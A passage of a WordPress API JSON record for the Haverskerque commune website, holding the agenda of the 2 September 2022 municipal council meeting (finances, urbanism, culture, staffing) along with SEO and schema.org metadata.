r\u00e9union \u00e0 la salle Victor Dehaine.2. D\u00e9nomination d\u2019une salle communale. FINANCES 3. Participation aux d\u00e9penses de fonctionnement de l\u2019\u00e9cole Saint-Exup\u00e9ry d\u2019Haverskerque &#8211; Mise \u00e0 jour.4. Mise en place de la nomenclature M57 \u00e0 compter du 1er janvier 2023. URBANISME 5. SIDEN-SIAN &#8211; Adh\u00e9sion de nouvelles communes.6. Acquisition par exercice du droit de pr\u00e9emption de l\u2019immeuble sis 45 rue de l\u2019\u00e9glise \u00e0 Haverskerque. CULTURE 7. Convention d\u2019objectifs avec le Conseil D\u00e9partemental du Nord &#8211; Autorisation de signature. RESSOURCES HUMAINES 8. Intervention sportive en milieu scolaire &#8211; Recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2022-2023.9. Intervention musicale en milieu scolaire &#8211; Recrutement et r\u00e9mun\u00e9ration pour l\u2019ann\u00e9e scolaire 2022-2023.10. Activit\u00e9 extrascolaire &#8211; Recrutement et r\u00e9mun\u00e9ration des intervenants danse pour l\u2019ann\u00e9e scolaire 2022-2023.11. Indemnit\u00e9 forfaitaire complmentaire pour \u00e9lections (IFCE) &#8211; Mise \u00e0 jour de la d\u00e9lib\u00e9ration du 29 juin 2004.12. Attribution de ch\u00e8ques cadeaux aux agents communaux.13. Recours au contrat d\u2019apprentissage.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2022-09-03T11:35:00+00:00","article_modified_time":"2024-07-29T04:38:40+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil Municipal du 02 Septembre 2022","datePublished":"2022-09-03T11:35:00+00:00","dateModified":"2024-07-29T04:38:40+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/"},"wordCount":199,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/","name":"Conseil Municipal du 02 Septembre 2022 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2022-09-03T11:35:00+00:00","dateModified":"2024-07-29T04:38:40+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2022\/09\/03\/conseil-municipal-du-02-septembre-2022\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil Municipal du 02 Septembre 2022"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/596","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=596"}],"version-history":[{"count":5,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/596\/revisions"}],"predecessor-version":[{"id":8297,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/596\/revisions\/8297"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=596"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=596"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=596"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}